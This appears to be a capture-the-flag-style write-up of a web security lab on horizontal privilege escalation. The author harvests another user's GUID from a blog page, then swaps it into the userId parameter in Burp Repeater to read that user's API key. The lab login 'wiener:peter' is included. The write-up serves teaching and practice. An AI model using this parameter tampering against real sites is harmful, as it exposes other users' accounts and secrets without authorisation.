User ID controlled by request parameter, with unpredictable user IDs
This is another example of "horizontal privilege escalation", this time using a GUID, which stands for Globally Unique Identifier.
After clicking "Access the lab", we see a blog. It's noticeable that various identifiers appear in the URL bar when viewing profiles of different users. I'm about to provide screenshots to clarify what I mean.
I click on the "View post" button under the first post:
Then on the username:
Now you can see the user's identifier in the URL bar:
userId=the_rest_is_guidSince we can obtain the administrator's GUID, we should also be able to get the user identifier for carlos. After a few seconds of searching, I found post ID 6, which belongs to carlos:
Clicking on his name, we obtain the GUID in the address bar:
userId=640f2c14-8f0e-44f3-aa69-df3376e7c5ebOur task is to obtain the API Key of the user carlos. However, we only have access to the user wiener.
We log in with the credentials provided in the task:
wiener:peter
We check the requests in Burp.
Let's see if changing the ID in the request will give us access to carlos's account:
Right-click on the highlighted request and select "Send to Repeater".
We replace userId with carlos's ID. We send the request. In response, we get status 200:
We copy the API Key, click "Submit solution" and send the response. Done:
